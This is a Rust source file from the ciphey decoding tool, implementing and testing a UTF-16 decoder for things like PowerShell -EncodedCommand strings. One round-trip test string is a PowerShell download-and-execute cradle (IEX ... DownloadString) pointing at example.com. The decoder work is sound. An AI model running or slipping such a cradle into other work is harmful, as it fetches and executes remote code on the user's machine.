//! Decode UTF-16 (little- or big-endian) text.
//!
//! UTF-16 stores text as 16-bit code units, low byte first (LE) or high byte first (BE),
//! with characters above U+FFFF written as surrogate pairs ([RFC 2781]). Windows uses
//! UTF-16LE, so PowerShell's `-EncodedCommand` is Base64 of UTF-16LE and hex dumps of
//! Windows strings are full of `00` bytes.
//!
//! Byte decoders such as Base64, Hexadecimal and Binary hand those bytes on as a string with
//! one char per byte: ASCII text in UTF-16LE comes out as `"W\0r\0i\0…"`. When the bytes
//! aren't valid UTF-8, e.g. because of a byte order mark, Hexadecimal and Binary turn each
//! byte into the Latin-1 char with that value (Base64 gives up). This decoder turns such a
//! string back into bytes and decodes them as UTF-16.
//!
//! The byte order is read from a byte order mark (`FF FE` for LE, `FE FF` for BE) or,
//! without one, from which byte of each code unit holds the NULs, so there is no key to
//! search. Call `utf16_decoder.crack` to use it.
//!
//! [RFC 2781]: https://datatracker.ietf.org/doc/html/rfc2781
use crate::checkers::CheckerTypes;
use crate::decoders::interface::check_string_success;

use super::crack_results::CrackResult;
use super::interface::Crack;
use super::interface::Decoder;

use log::{debug, info, trace};

/// The UTF-16 decoder, call:
/// `let utf16_decoder = Decoder::<Utf16Decoder>::new()` to create a new instance
/// And then call:
/// `result = utf16_decoder.crack(input)` to decode UTF-16 text
/// The struct generated by new() comes from interface.rs
/// ```
/// use ciphey::decoders::utf16_decoder::Utf16Decoder;
/// use ciphey::decoders::interface::{Crack, Decoder};
/// use ciphey::checkers::{athena::Athena, CheckerTypes, checker_type::{Check, Checker}};
///
/// let decode_utf16 = Decoder::<Utf16Decoder>::new();
/// let athena_checker = Checker::<Athena>::new();
/// let checker = CheckerTypes::CheckAthena(athena_checker);
///
/// // What the Base64 decoder makes of a PowerShell -EncodedCommand (Base64 of UTF-16LE)
/// let utf16le = "W\0r\0i\0t\0e\0-\0O\0u\0t\0p\0u\0t\0 \0'\0h\0e\0l\0l\0o\0 \0w\0o\0r\0l\0d\0'\0";
/// let result = decode_utf16.crack(utf16le, &checker);
/// assert_eq!(result.unencrypted_text.unwrap()[0], "Write-Output 'hello world'");
/// // The key is the byte order that was detected
/// assert_eq!(result.key.as_deref(), Some("LE"));
/// ```
pub struct Utf16Decoder;

impl Crack for Decoder<Utf16Decoder> {
    fn new() -> Decoder<Utf16Decoder> {
        Decoder {
            name: "UTF-16",
            description: "UTF-16 (16-bit Unicode Transformation Format) is a character encoding that stores text as one or two 16-bit code units per character, in little-endian (LE) or big-endian (BE) byte order, optionally after a byte order mark (FF FE or FE FF). Windows uses UTF-16LE, so PowerShell's -EncodedCommand and many Windows hex and Base64 dumps are UTF-16LE text.",
            link: "https://en.wikipedia.org/wiki/UTF-16",
            tags: vec!["utf16", "unicode", "text_encoding", "decoder"],
            popularity: 0.5,
            phantom: std::marker::PhantomData,
        }
    }

    /// This function does the actual decoding
    /// It returns an `Option<String>` if it was successful
    /// Else the Option returns nothing and the error is logged in Trace
    fn crack(&self, text: &str, checker: &CheckerTypes) -> CrackResult {
        trace!("Trying UTF-16 with text {:?}", text);
        let mut results = CrackResult::new(self, text.to_string());

        let Some((decoded_text, byte_order)) = decode_utf16_text(text) else {
            debug!("Failed to decode UTF-16 because decode_utf16_text returned None");
            return results;
        };

        if !check_string_success(&decoded_text, text) {
            info!(
                "Failed to decode UTF-16 because check_string_success returned false on string {}",
                decoded_text
            );
            return results;
        }

        let checker_result = checker.check(&decoded_text);
        results.unencrypted_text = Some(vec![decoded_text]);
        results.key = Some(byte_order.to_string());
        results.update_checker(&checker_result);

        results
    }
    /// Gets all tags for this decoder
    fn get_tags(&self) -> &Vec<&str> {
        &self.tags
    }
    /// Gets the name for the current decoder
    fn get_name(&self) -> &str {
        self.name
    }
    /// Gets the popularity for the current decoder
    fn get_popularity(&self) -> f32 {
        self.popularity
    }
    /// Gets the description for the current decoder
    fn get_description(&self) -> &str {
        self.description
    }
    /// Gets the link for the current decoder
    fn get_link(&self) -> &str {
        self.link
    }
}

/// The UTF-16LE byte order mark, bytes `FF FE`, as one char per byte.
const LE_BOM: &str = "\u{FF}\u{FE}";
/// The UTF-16BE byte order mark, bytes `FE FF`, as one char per byte.
const BE_BOM: &str = "\u{FE}\u{FF}";

/// The byte order of UTF-16 code units.
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
enum ByteOrder {
    /// Little-endian: the low byte of each code unit comes first.
    Little,
    /// Big-endian: the high byte of each code unit comes first.
    Big,
}

impl ByteOrder {
    /// The name reported as the decoder's key.
    fn name(self) -> &'static str {
        match self {
            ByteOrder::Little => "LE",
            ByteOrder::Big => "BE",
        }
    }

    /// Joins two bytes into a code unit.
    fn code_unit(self, pair: [u8; 2]) -> u16 {
        match self {
            ByteOrder::Little => u16::from_le_bytes(pair),
            ByteOrder::Big => u16::from_be_bytes(pair),
        }
    }
}

/// Decodes `text`, a string with one char per byte, as UTF-16.
///
/// Returns the decoded text and its byte order, `"LE"` or `"BE"`. Returns `None`, cheapest
/// checks first, if:
/// * `text` neither contains a NUL nor starts with a byte order mark
/// * a char is above U+00FF, so it isn't a byte
/// * there is an odd number of bytes, or fewer than 2 code units after the byte order mark
/// * there is no byte order mark and the NULs don't show the byte order (see
///   [`guess_byte_order`])
/// * the code units aren't valid UTF-16, e.g. an unpaired surrogate
/// * the result contains a control character other than `\t`, `\n` and `\r`. A NUL left
///   over means the input was something else, such as UTF-32.
fn decode_utf16_text(text: &str) -> Option<(String, &'static str)> {
    let bom = if text.starts_with(LE_BOM) {
        Some(ByteOrder::Little)
    } else if text.starts_with(BE_BOM) {
        Some(ByteOrder::Big)
    } else {
        None
    };
    // Rejects almost every input with one memchr, before anything is allocated
    if bom.is_none() && !text.contains('\0') {
        return None;
    }

    let bytes = text
        .chars()
        .map(|c| u8::try_from(c).ok())
        .collect::<Option<Vec<u8>>>()?;
    let bytes = match bom {
        Some(_) => &bytes[2..],
        None => &bytes[..],
    };
    let (pairs, odd_byte) = bytes.as_chunks::<2>();
    if !odd_byte.is_empty() || pairs.len() < 2 {
        return None;
    }

    let byte_order = match bom {
        Some(byte_order) => byte_order,
        None => guess_byte_order(pairs)?,
    };

    let code_units: Vec<u16> = pairs
        .iter()
        .map(|&pair| byte_order.code_unit(pair))
        .collect();
    // Strict: an unpaired surrogate is an error rather than U+FFFD
    let decoded = String::from_utf16(&code_units).ok()?;

    if decoded
        .chars()
        .any(|c| c.is_control() && !matches!(c, '\t' | '\n' | '\r'))
    {
        return None;
    }

    Some((decoded, byte_order.name()))
}

/// Guesses the byte order of UTF-16 code units, given as byte pairs, that have no byte
/// order mark.
///
/// Each code unit of an ASCII or Latin-1 character has a NUL high byte: the second byte of
/// the pair in LE, the first in BE. Picks the order whose NUL position covers at least half
/// of the code units and more of them than the other order's, so that ordinary text with
/// an even number of bytes doesn't decode into CJK characters.
fn guess_byte_order(pairs: &[[u8; 2]]) -> Option<ByteOrder> {
    let le_nuls = pairs.iter().filter(|pair| pair[1] == 0).count();
    let be_nuls = pairs.iter().filter(|pair| pair[0] == 0).count();

    if le_nuls * 2 >= pairs.len() && le_nuls > be_nuls {
        Some(ByteOrder::Little)
    } else if be_nuls * 2 >= pairs.len() && be_nuls > le_nuls {
        Some(ByteOrder::Big)
    } else {
        None
    }
}

#[cfg(test)]
mod tests {
    use super::{decode_utf16_text, Utf16Decoder};
    use crate::{
        checkers::{
            athena::Athena,
            checker_type::{Check, Checker},
            CheckerTypes,
        },
        decoders::{
            base64_decoder::Base64Decoder,
            hexadecimal_decoder::HexadecimalDecoder,
            interface::{Crack, Decoder},
        },
    };

    // Test vectors. Each one was checked with Python 3 (`bytes.decode("utf-16-le")` /
    // `bytes.decode("utf-16-be")` / `bytes.decode("utf-16")` for the BOM forms) and with
    // CyberChef (From Base64 / From Hex, then Decode text with UTF-16LE (1200) or
    // UTF-16BE (1201)).

    /// The PowerShell `-EncodedCommand` example from issue #943:
    /// `base64.b64encode("Write-Output 'hello world'".encode("utf-16-le"))`
    const POWERSHELL_BASE64: &str =
        "VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAnAGgAZQBsAGwAbwAgAHcAbwByAGwAZAAnAA==";
    /// The same UTF-16LE bytes as hex
    const POWERSHELL_HEX: &str = "570072006900740065002d004f007500740070007500740020002700680065006c006c006f00200077006f0072006c0064002700";
    /// What the Base64 and Hexadecimal decoders make of both of the above
    const POWERSHELL_UTF16LE: &str =
        "W\0r\0i\0t\0e\0-\0O\0u\0t\0p\0u\0t\0 \0'\0h\0e\0l\0l\0o\0 \0w\0o\0r\0l\0d\0'\0";
    /// `"The quick brown fox jumps over the lazy dog".encode("utf-16-be").hex()`
    const FOX_HEX: &str = "00540068006500200071007500690063006b002000620072006f0077006e00200066006f00780020006a0075006d007000730020006f00760065007200200074006800650020006c0061007a007900200064006f0067";
    /// What the Hexadecimal decoder makes of `FOX_HEX`
    const FOX_UTF16BE: &str = "\0T\0h\0e\0 \0q\0u\0i\0c\0k\0 \0b\0r\0o\0w\0n\0 \0f\0o\0x\0 \0j\0u\0m\0p\0s\0 \0o\0v\0e\0r\0 \0t\0h\0e\0 \0l\0a\0z\0y\0 \0d\0o\0g";
    /// `"hello world".encode("utf-16")` on a little-endian machine, which starts with the
    /// byte order mark `FF FE`
    const HELLO_BOM_HEX: &str = "fffe680065006c006c006f00200077006f0072006c006400";
    /// What the Hexadecimal decoder makes of `HELLO_BOM_HEX`: `FF` isn't UTF-8, so every
    /// byte becomes the Latin-1 char with that value
    const HELLO_BOM_UTF16LE: &str = "\u{FF}\u{FE}h\0e\0l\0l\0o\0 \0w\0o\0r\0l\0d\0";

    // helper for tests
    fn get_athena_checker() -> CheckerTypes {
        let athena_checker = Checker::<Athena>::new();
        CheckerTypes::CheckAthena(athena_checker)
    }

    // helper for tests: `text` encoded as UTF-16 with `to_bytes`, one char per byte, as the
    // byte decoders hand it on
    fn utf16_bytes_as_chars(text: &str, to_bytes: fn(u16) -> [u8; 2]) -> String {
        text.encode_utf16()
            .flat_map(to_bytes)
            .map(char::from)
            .collect()
    }

    // helper for tests: the first text a decoder returns
    fn decoded_by<T>(decoder: Decoder<T>, text: &str) -> String
    where
        Decoder<T>: Crack,
    {
        decoder
            .crack(text, &get_athena_checker())
            .unencrypted_text
            .expect("the decoder should return text")
            .remove(0)
    }

    #[test]
    fn utf16_is_registered() {
        // The search gets its decoders from the filtration system...
        let decoders = crate::filtration_system::get_decoder_by_name("UTF-16");
        assert_eq!(decoders.components.len(), 1);
        // ...and cached paths are read back through DECODER_MAP
        let decoder = crate::decoders::DECODER_MAP
            .get("UTF-16")
            .expect("UTF-16 should be in DECODER_MAP")
            .get::<crate::decoders::DecoderType>();
        assert_eq!(decoder.get_name(), "UTF-16");
    }

    #[test]
    fn byte_decoders_pass_utf16_on_as_one_char_per_byte() {
        // The inputs the tests below use are what the search really hands this decoder
        assert_eq!(
            decoded_by(Decoder::<Base64Decoder>::new(), POWERSHELL_BASE64),
            POWERSHELL_UTF16LE
        );
        assert_eq!(
            decoded_by(Decoder::<HexadecimalDecoder>::new(), POWERSHELL_HEX),
            POWERSHELL_UTF16LE
        );
        assert_eq!(
            decoded_by(Decoder::<HexadecimalDecoder>::new(), FOX_HEX),
            FOX_UTF16BE
        );
        assert_eq!(
            decoded_by(Decoder::<HexadecimalDecoder>::new(), HELLO_BOM_HEX),
            HELLO_BOM_UTF16LE
        );
    }

    #[test]
    fn utf16le_successful_decoding() {
        let utf16_decoder = Decoder::<Utf16Decoder>::new();
        let result = utf16_decoder.crack(POWERSHELL_UTF16LE, &get_athena_checker());
        assert!(result.success);
        assert_eq!(result.key.as_deref(), Some("LE"));
        assert_eq!(
            result.unencrypted_text.unwrap()[0],
            "Write-Output 'hello world'"
        );
    }

    #[test]
    fn utf16be_successful_decoding() {
        let utf16_decoder = Decoder::<Utf16Decoder>::new();
        let result = utf16_decoder.crack(FOX_UTF16BE, &get_athena_checker());
        assert!(result.success);
        assert_eq!(result.key.as_deref(), Some("BE"));
        assert_eq!(
            result.unencrypted_text.unwrap()[0],
            "The quick brown fox jumps over the lazy dog"
        );
    }

    #[test]
    fn utf16le_with_bom_successful_decoding() {
        let utf16_decoder = Decoder::<Utf16Decoder>::new();
        let result = utf16_decoder.crack(HELLO_BOM_UTF16LE, &get_athena_checker());
        assert!(result.success);
        assert_eq!(result.key.as_deref(), Some("LE"));
        assert_eq!(result.unencrypted_text.unwrap()[0], "hello world");
    }

    #[test]
    fn utf16be_with_bom_decodes() {
        // "hello world".encode("utf-16-be") after the byte order mark FE FF
        assert_eq!(
            decode_utf16_text("\u{FE}\u{FF}\0h\0e\0l\0l\0o\0 \0w\0o\0r\0l\0d"),
            Some(("hello world".to_string(), "BE"))
        );
    }

    #[test]
    fn non_ascii_text_decodes() {
        // base64.b64decode("QwBhAGYA6QAgABUmIABuAGEA7wB2AGUA").decode("latin-1"). The
        // Base64 decoder can't produce this itself because the bytes aren't UTF-8.
        assert_eq!(
            decode_utf16_text("C\0a\0f\0\u{e9}\0 \0\u{15}& \0n\0a\0\u{ef}\0v\0e\0"),
            Some(("Café ☕ naïve".to_string(), "LE"))
        );
    }

    #[test]
    fn surrogate_pairs_decode() {
        // "hi 😀".encode("utf-16-le"): U+1F600 is the surrogate pair D83D DE00
        assert_eq!(
            decode_utf16_text("h\0i\0 \0=\u{d8}\0\u{de}"),
            Some(("hi 😀".to_string(), "LE"))
        );
    }

    #[test]
    fn bom_sets_the_byte_order_of_text_without_nuls() {
        // "日本語" after a byte order mark, in both byte orders
        assert_eq!(
            decode_utf16_text("\u{FF}\u{FE}\u{e5}e,g\u{9e}\u{8a}"),
            Some(("日本語".to_string(), "LE"))
        );
        assert_eq!(
            decode_utf16_text("\u{FE}\u{FF}e\u{e5}g,\u{8a}\u{9e}"),
            Some(("日本語".to_string(), "BE"))
        );
        // Without a byte order mark there is nothing to tell this apart from other bytes
        assert_eq!(decode_utf16_text("\u{e5}e,g\u{9e}\u{8a}"), None);
    }

    #[test]
    fn utf16_round_trips() {
        for text in [
            "Write-Output 'hello world'",
            "Ünïcödé text in UTF-16, with an emoji 😀 and a newline\r\n",
            "IEX (New-Object Net.WebClient).DownloadString('http://example.com/a.ps1')",
        ] {
            assert_eq!(
                decode_utf16_text(&utf16_bytes_as_chars(text, u16::to_le_bytes)),
                Some((text.to_string(), "LE"))
            );
            assert_eq!(
                decode_utf16_text(&utf16_bytes_as_chars(text, u16::to_be_bytes)),
                Some((text.to_string(), "BE"))
            );
        }
    }

    #[test]
    fn utf16_that_is_not_plaintext_is_returned_for_further_decoding() {
        // A Base64 string inside UTF-16LE: the search goes on to decode the Base64
        let utf16_decoder = Decoder::<Utf16Decoder>::new();
        let result = utf16_decoder.crack(
            &utf16_bytes_as_chars("SGVsbG8sIFdvcmxkIQ==", u16::to_le_bytes),
            &get_athena_checker(),
        );
        assert!(!result.success);
        assert_eq!(result.key.as_deref(), Some("LE"));
        assert_eq!(result.unencrypted_text.unwrap()[0], "SGVsbG8sIFdvcmxkIQ==");
    }

    #[test]
    fn utf16_fails_on_unpaired_surrogate() {
        // Bytes 3D D8 41 00: the high surrogate D83D followed by 'A'. Python raises
        // "illegal UTF-16 surrogate".
        assert_eq!(decode_utf16_text("=\u{d8}A\0"), None);
        // A low surrogate on its own
        assert_eq!(decode_utf16_text("A\0\0\u{de}B\0"), None);
    }

    #[test]
    fn utf16_fails_when_nuls_are_left_over() {
        // "hi".encode("utf-32-le") reads as "h\0i\0" in UTF-16LE
        assert_eq!(decode_utf16_text("h\0\0\0i\0\0\0"), None);
    }

    #[test]
    fn utf16_fails_on_control_characters() {
        assert_eq!(decode_utf16_text("A\0\u{7}\0B\0"), None);
        // Whitespace is fine
        assert_eq!(
            decode_utf16_text("A\0\t\0B\0\r\0\n\0"),
            Some(("A\tB\r\n".to_string(), "LE"))
        );
    }

    #[test]
    fn utf16_fails_on_odd_or_short_input() {
        assert_eq!(decode_utf16_text("W\0r\0i"), None);
        assert_eq!(decode_utf16_text("A\0"), None);
        assert_eq!(decode_utf16_text("\u{FF}\u{FE}"), None);
        assert_eq!(decode_utf16_text("\u{FF}\u{FE}A\0"), None);
    }

    #[test]
    fn utf16_fails_on_chars_that_are_not_bytes() {
        assert_eq!(decode_utf16_text("W\0r\0☕\0"), None);
    }

    #[test]
    fn utf16_fails_when_the_byte_order_is_unclear() {
        // As many NULs in each position
        assert_eq!(decode_utf16_text("A\0\0B"), None);
        assert_eq!(decode_utf16_text("\0\0\0\0"), None);
        // NULs in under half of the code units
        assert_eq!(decode_utf16_text("hello\0world!"), None);
    }

    #[test]
    fn utf16_fails_on_text_without_nuls_or_bom() {
        // Even-length ASCII would decode into CJK characters
        for text in ["", "hello world", "abcd", "😀", "Привет"] {
            assert_eq!(decode_utf16_text(text), None, "{text:?}");
        }
    }

    #[test]
    fn utf16_decode_empty_string() {
        let utf16_decoder = Decoder::<Utf16Decoder>::new();
        let result = utf16_decoder.crack("", &get_athena_checker());
        assert!(!result.success);
        assert!(result.unencrypted_text.is_none());
        assert!(result.key.is_none());
    }

    #[test]
    fn utf16_decode_handles_panics() {
        let utf16_decoder = Decoder::<Utf16Decoder>::new();
        let result = utf16_decoder.crack(
            "hello my name is panicky mc panic face!",
            &get_athena_checker(),
        );
        assert!(!result.success);
        assert!(result.unencrypted_text.is_none());
    }

    #[test]
    fn utf16_handle_panic_if_emoji() {
        let utf16_decoder = Decoder::<Utf16Decoder>::new();
        let result = utf16_decoder.crack("😂", &get_athena_checker());
        assert!(!result.success);
        assert!(result.unencrypted_text.is_none());
    }
}
